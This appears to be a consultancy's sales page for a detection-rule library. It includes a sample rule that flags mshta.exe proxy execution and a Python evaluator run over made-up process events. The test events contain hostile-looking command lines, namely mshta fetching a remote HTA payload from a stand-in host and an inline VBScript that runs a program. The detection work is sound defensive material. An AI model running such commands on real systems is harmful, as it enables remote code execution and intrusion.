
Detection Rule Library

Production-ready detections written for your platform

You tell me your SIEM/EDR platform and your top threat concerns. I deliver a library of production-ready detection rules grounded in real-world experience, not generic templates pulled from a blog post. Each rule includes MITRE ATT&CK mapping, tuning guidance, and false positive documentation so your team can deploy with confidence.

Deliverables

  • Git repo with 30–50 detection rules written for your platform (Splunk, CrowdStrike, Elastic, SentinelOne, and others) or as vendor-neutral Sigma rules
  • Each rule includes detection logic, description, severity, MITRE mapping, and tuning notes
  • Coverage summary mapping delivered rules to ATT&CK techniques
  • One round of revisions after your team reviews

How It Works

1. Scoping call

We discuss your platform, telemetry sources, top threat concerns, and any existing detection coverage you want to build on.

2. Research & development

I research the threat landscape relevant to your environment and write detection rules tailored to your telemetry, platform, and attack surface.

3. Delivery & review

You receive a git repo with all rules, documentation, and a coverage map. Your team reviews and I incorporate one round of feedback.

What a Rule Looks Like

title: Mshta.exe Executing Remote HTA Payload
status: production
severity: high
mitre:
  - T1218.005  # System Binary Proxy Execution: Mshta

detection:
  process_name: mshta.exe
  command_line contains any:
    - "http://"
    - "https://"
    - "javascript:"
    - "vbscript:"
  filter:
    parent_process: msiexec.exe
    command_line contains: "res://"

description: >
  Detects mshta.exe fetching or executing remote content.
  Mshta is a signed Microsoft binary rarely used in normal
  operations but frequently abused to proxy execution of
  malicious HTA files and inline scripts.

tuning_notes: >
  Legitimate use is uncommon. Some legacy installers invoke
  mshta via msiexec, handled by the filter above. Monitor
  for new parent processes before adding exclusions.

false_positives:
  - Legacy MSI installers rendering HTML-based dialogs

Every rule in the library follows this structure: clear logic, context your analysts need, and practical tuning guidance.
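To show how the logic above behaves on telemetry, here is the same rule encoded as a small Python evaluator and run over a handful of constructed process-creation events. This is an added illustration, not the consultancy's deliverable or code from any SIEM; the event fields (process_name, parent_process, command_line), the dictionary encoding of the rule, and the sample command lines are all assumptions made for the example.

```python
"""Evaluate the mshta.exe rule from the page against process-creation events.

Added example, not code from the original page. Event field names, the rule
encoding, and every sample event below are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Iterable, List

# The page's pseudo-YAML rule as a dict. Match = process_name AND any indicator;
# filter = parent_process AND substring (BOTH must hold to suppress the event).
MSHTA_RULE = {
    "title": "Mshta.exe Executing Remote HTA Payload",
    "severity": "high",
    "mitre": ["T1218.005"],
    "process_name": "mshta.exe",
    "command_line_contains_any": ["http://", "https://", "javascript:", "vbscript:"],
    "filter": {"parent_process": "msiexec.exe", "command_line_contains": "res://"},
}


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (assumed field names)."""
    process_name: str
    parent_process: str
    command_line: str


def matches(rule: dict, ev: ProcessEvent) -> bool:
    """Return True when the event should raise the alert."""
    # Compare case-insensitively: Windows image names and URL schemes show up
    # in mixed case across EDR and Sysmon telemetry.
    cmd = ev.command_line.lower()
    if ev.process_name.lower() != rule["process_name"]:
        return False
    if not any(ind in cmd for ind in rule["command_line_contains_any"]):
        return False
    # The filter is a conjunction: only an msiexec-spawned mshta whose command
    # line also references a res:// resource is treated as a legacy installer.
    flt = rule["filter"]
    if ev.parent_process.lower() == flt["parent_process"] and flt["command_line_contains"] in cmd:
        return False
    return True


def run(rule: dict, events: Iterable[ProcessEvent]) -> List[dict]:
    """Apply the rule to a stream of events and return alert records."""
    return [
        {
            "title": rule["title"],
            "severity": rule["severity"],
            "mitre": rule["mitre"],
            "parent_process": ev.parent_process,
            "command_line": ev.command_line,
        }
        for ev in events
        if matches(rule, ev)
    ]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1: remote HTA fetched over HTTPS -> alert
    ProcessEvent("mshta.exe", "cmd.exe", "mshta.exe https://example.invalid/payload.hta"),
    # 2: inline vbscript: launched from Word, mixed-case image name -> alert
    ProcessEvent("MSHTA.EXE", "winword.exe",
                 'mshta VBScript:Execute("CreateObject(""Wscript.Shell"").Run ""calc""")'),
    # 3: installer dialog via msiexec, res:// plus an https link -> suppressed by filter
    ProcessEvent("mshta.exe", "msiexec.exe",
                 "mshta.exe res://C:\\Windows\\Installer\\MSI1A2B.tmp/welcome.hta?eula=https://vendor.invalid/eula"),
    # 4: local .hta file, no remote/inline indicator -> no alert (rule does not cover this)
    ProcessEvent("mshta.exe", "explorer.exe", "mshta.exe C:\\Users\\alice\\Desktop\\notes.hta"),
    # 5: msiexec parent but no res:// -> filter does NOT apply, alert
    ProcessEvent("mshta.exe", "msiexec.exe", "mshta.exe https://example.invalid/update.hta"),
]


if __name__ == "__main__":
    for alert in run(MSHTA_RULE, SAMPLE_EVENTS):
        print(alert["severity"], alert["parent_process"], "->", alert["command_line"])
```

Two things worth checking before deploying a rule shaped like this: the filter is a conjunction, so an msiexec-spawned mshta that reaches out over HTTPS without a res:// reference (event 5) still alerts, which is the intended behaviour; and the indicator list only covers remote URLs and inline script schemes, so mshta executing a local .hta dropped to disk (event 4) is not caught by this rule and needs separate coverage.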

Timeline

3–4 weeks

Pricing

Starting at $8K

What You Provide

Your SIEM/EDR platform, top threat concerns, and telemetry field documentation

Ready to get started?